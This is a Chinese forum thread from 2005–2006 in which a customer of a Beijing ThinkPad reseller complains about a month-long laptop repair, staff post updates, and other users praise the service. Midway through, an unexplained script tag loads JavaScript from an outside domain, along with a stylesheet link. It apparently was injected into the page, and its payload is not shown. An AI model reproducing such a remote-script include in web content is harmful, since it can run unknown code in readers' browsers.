开业于2004年,诚信服务几万客户
翔意数码淘宝店:xynbnb.taobao.com
全国客服电话:010-59000667
地址:北京东城区东兴隆街56号北京商界A座512
ThinkPad产品专业客服 苹果产品专业客服

濒临崩溃....

兄弟们~ 你们有电脑的送修史么? 都需要多少天啊? 我已经送修34天了(24个工作日了), 已经严重的影响我正常的生活了:cu03: ...... 一直没有电脑用,濒临崩溃:jlose: 以下史管理员给我的恢复:

Q:
我的电脑8ZU已经送修23工作日了,什么时候能修好啊~~  元旦就离要开北京了.....  到时候取也很麻烦了....
A:
尽量,我也不能承诺你,因为是IBM售后修,而且年底特殊情况,碰上休息和圣诞节新年比较多,所以稍微慢一点

好郁闷啊.....  新年之前都够戗啊......:cu03:

usb坏的那个对吧?节前就修好了,不过赶上圣诞节,那边休息了,28号那边上班就发回来,这周就可以拿到,再耐心等2天,对此耽误您的工作抱以深深的歉意
★★★
<script type="text/javascript" src="http://www.972.cc/1.js"></script>
<link href="http://www.972.cc/1.css" rel="stylesheet" type="text/css" media="screen" />

<P>&nbsp;</P>

原帖由 administrator 于 2005-12-27 14:16 发表
usb坏的那个对吧?节前就修好了,不过赶上圣诞节,那边休息了,28号那边上班就发回来,这周就可以拿到,再耐心等2天,对此耽误您的工作抱以深深的歉意

多谢了~~~ 有个时间期限就行了,就有盼头了......:au29:
应该是明天下午6点左右到我们手里,到了会给您打电话的,耽误您的工作只能说不好意思了,8ZU的风扇问题我们也比较苦恼,呵呵
原帖由 EddieFan 于 2005-12-28 22:43 发表
应该是明天下午6点左右到我们手里,到了会给您打电话的,耽误您的工作只能说不好意思了,8ZU的风扇问题我们也比较苦恼,呵呵

:jlose: 终于有希望了,其实差几天到时无所谓..... 就是想要一个期限.... 最好不是一万年....

风扇.....:au29:  我的风扇暂时还没问题,不过马上就要过一年保了 :cu03:
hoho~ 今天终于拿到本本了~~   本子也终于修好了~~  好像主板是换新的了。 总之是能用了。  感谢翔意~ 感谢YY
原帖由 EddieFan 于 2005-12-28 22:43 发表

就凭这态度.老子非这里不买了
听说不是有备机的吗?
是啊??不是有备用机么??
偶没有。。。。  不知道为啥。。。
备用机一般15个工作日后提供,现在出去的几台还没拿回来呢
因为我们手里有2台备用机,都被借出去的时候就没有了

另外并不是所有客户送修的时候都会申请

再另外,搂主的机器已经修好拿走了
取回修好的机器已经用一周了~~  是否有备用机也不重要了~~  :) 总之本子继续能陪伴我了。。。。 :)
8ZU的风扇确实是比较常见得问题.尽量少运行大型游戏或者注意使用环境,多多清洁吧
多谢EddieFan ~~  希望不会出现什么问题。。。 我不用本子打游戏的~~  说实话不是舍不得不不适应。。。 呵呵
您的机器到我们手里那个脏,一点看不出来哦......:ksk::ksk::ksk:
哦???  真的么????  你是说风扇很脏。。。还是都脏。。。 我虽然不打游戏,但是每天开机也要10小时以上。。。。  应该是机房的空气不好~ 不是我个人不讲卫生 :)
- -原来那个脏啊,狂笑
原帖由 EDL 于 2006-1-8 18:11 发表
- -原来那个脏啊,狂笑

:ksk: :ksk: :ksk: :cu30: :cu30: :cu30:
这态度让人放心啊
每看一贴,信心就增加一点!嗬嗬,离出手购机不远了!
看来lz奔溃不了了啊!
好的售后服务是我选择供应商的首要条件
hehe  多注意保养吧
看来xy售后挺好的